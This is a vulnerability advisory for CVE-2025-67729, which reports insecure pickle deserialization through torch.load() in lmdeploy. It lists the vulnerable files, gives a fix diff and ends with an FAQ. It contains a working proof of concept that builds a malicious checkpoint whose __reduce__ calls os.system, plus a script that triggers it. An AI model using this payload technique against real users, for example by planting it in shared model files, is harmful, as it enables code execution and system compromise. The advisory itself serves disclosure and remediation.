CVE-2025-67729: lmdeploy vulnerable to Arbitrary Code Execution via Insecure Deserialization in torch.load()
Summary
An insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weightsonly=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file.
CWE: CWE-502 - Deserialization of Untrusted Data
---
Details
Several locations in lmdeploy use torch.load() without the recommended weightsonly=True security parameter. PyTorch's torch.load() uses Python's pickle module internally, which can execute arbitrary code during deserialization.
Vulnerable Locations
1. lmdeploy/vl/model/utils.py (Line 22)
python def loadweightckpt(ckpt: str) -> Dict[str, torch.Tensor]: """Load checkpoint.""" if ckpt.endswith('.safetensors'): return loadfile(ckpt) # Safe - uses safetensors else: return torch.load(ckpt) # ← VULNERABLE: no weightsonly=True
2. lmdeploy/turbomind/deploy/loader.py (Line 122)
python class PytorchLoader(BaseLoader): def items(self): params = defaultdict(dict) for shard in self.shards: misc = {} tmp = torch.load(shard, maplocation='cpu') # ← VULNERABLE
Additional vulnerable locations: - lmdeploy/lite/apis/kvqparams.py:129-130 - lmdeploy/lite/apis/smoothquant.py:61 - lmdeploy/lite/apis/autoawq.py:101 - lmdeploy/lite/apis/getsmallshardedhf.py:41
Note: Secure Pattern Already Exists
The codebase already uses the secure pattern in one location:
python lmdeploy/pytorch/weightloader/modelweightloader.py:103 state = torch.load(file, weightsonly=True, maplocation='cpu') # ✓ Secure
This shows the fix is already known and can be applied consistently across the codebase.
---
PoC
Step 1: Create a Malicious Checkpoint File
Save this as createmaliciouscheckpoint.py:
python #!/usr/bin/env python3 """ Creates a malicious PyTorch checkpoint that executes code when loaded. """ import pickle import os
class MaliciousPayload: """Executes arbitrary code during pickle deserialization.""" def init(self, command): self.command = command def reduce(self): # This is called during unpickling - returns (callable, args) return (os.system, (self.command,))
def createmaliciouscheckpoint(outputpath, command): """Create a malicious checkpoint file.""" maliciousstatedict = { 'model.layer.weight': MaliciousPayload(command), 'config': {'hiddensize': 768} } with open(outputpath, 'wb') as f: pickle.dump(maliciousstatedict, f) print(f"[+] Created malicious checkpoint: {outputpath}")
if name == "main": os.makedirs("maliciousmodel", existok=True) createmaliciouscheckpoint( "maliciousmodel/pytorchmodel.bin", "echo '[PoC] Arbitrary code executed! - RCE confirmed'" )
Step 2: Load the Malicious File (Simulates lmdeploy's Behavior)
Save this as exploit.py:
python #!/usr/bin/env python3 """ Demonstrates the vulnerability by loading the malicious checkpoint. This simulates what happens when lmdeploy loads an untrusted model. """ import pickle
def unsafeload(path): """Simulates torch.load() without weightsonly=True.""" # torch.load() uses pickle internally, so this is equivalent with open(path, 'rb') as f: return pickle.load(f)
if name == "main": print("[] Loading malicious checkpoint...") print("[] This simulates: torch.load(ckpt) in lmdeploy") print("-" 50) result = unsafeload("maliciousmodel/pytorchmodel.bin") print("-" 50) print(f"[!] Checkpoint loaded. Keys: {list(result.keys())}") print("[!] If you see the PoC message above, RCE is confirmed!")
Step 3: Run the PoC
bash Create the malicious checkpoint python createmaliciouscheckpoint.py
Exploit - triggers code execution python exploit.py
Expected Output
[+] Created malicious checkpoint: maliciousmodel/pytorchmodel.bin [] Loading malicious checkpoint... [] This simulates: torch.load(ckpt) in lmdeploy -------------------------------------------------- [PoC] Arbitrary code executed! - RCE confirmed ← Code executed here! -------------------------------------------------- [!] Checkpoint loaded. Keys: ['model.layer.weight', 'config'] [!] If you see the PoC message above, RCE is confirmed!
The [PoC] Arbitrary code executed! message proves that arbitrary shell commands run during deserialization.
---
Impact
Who Is Affected?
- All users who load PyTorch model files (.bin, .pt) from untrusted sources - This includes models downloaded from HuggingFace, ModelScope, or shared by third parties
Attack Scenario
1. Attacker creates a malicious model file (e.g., pytorchmodel.bin) containing a pickle payload 2. Attacker distributes it as a "fine-tuned model" on model sharing platforms or directly to victims 3. Victim downloads and loads the model using lmdeploy 4. Malicious code executes with the victim's privileges
Potential Consequences
- Remote Code Execution (RCE) - Full system compromise - Data theft - Access to sensitive files, credentials, API keys - Lateral movement - Pivot to other systems in cloud environments - Cryptomining or ransomware - Malware deployment
---
Recommended Fix
Add weightsonly=True to all torch.load() calls:
diff lmdeploy/vl/model/utils.py:22 - return torch.load(ckpt) + return torch.load(ckpt, weightsonly=True)
lmdeploy/turbomind/deploy/loader.py:122 - tmp = torch.load(shard, maplocation='cpu') + tmp = torch.load(shard, maplocation='cpu', weightsonly=True)
Apply the same pattern to: - lmdeploy/lite/apis/kvqparams.py:129-130 - lmdeploy/lite/apis/smoothquant.py:61 - lmdeploy/lite/apis/autoawq.py:101 - lmdeploy/lite/apis/getsmallshardedhf.py:41
Alternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.
---
Resources
Official PyTorch Security Documentation
- PyTorch torch.load() Documentation > "torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source."
Related CVEs
| CVE | Description | CVSS | |-----|-------------|------| | CVE-2025-32434 | PyTorch torch.load() RCE vulnerability | 9.3 Critical | | CVE-2024-5452 | PyTorch Lightning insecure deserialization | 8.8 High |
Additional Resources
- CWE-502: Deserialization of Untrusted Data - Trail of Bits: Exploiting ML Pickle Files - Rapid7: Attackers Weaponizing AI Models
---
Thank you for your time reviewing this report. I'm happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!
Other sources
LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weightsonly=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1.
— MITRE
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2025-67729?
CVE-2025-67729 has a high severity level due to its potential for arbitrary code execution on the victim's machine.
How do I fix CVE-2025-67729?
To fix CVE-2025-67729, update lmdeploy to version 0.11.1 or later, which includes the fix for the insecure deserialization vulnerability.
What is the cause of CVE-2025-67729?
CVE-2025-67729 is caused by the unsafe use of torch.load() without the weights_only=True parameter when loading model checkpoint files.
What software is affected by CVE-2025-67729?
CVE-2025-67729 affects all versions of lmdeploy up to and including version 0.11.
How does CVE-2025-67729 impact users?
Users of lmdeploy are at risk of malicious code execution if they load a crafted model checkpoint file due to CVE-2025-67729.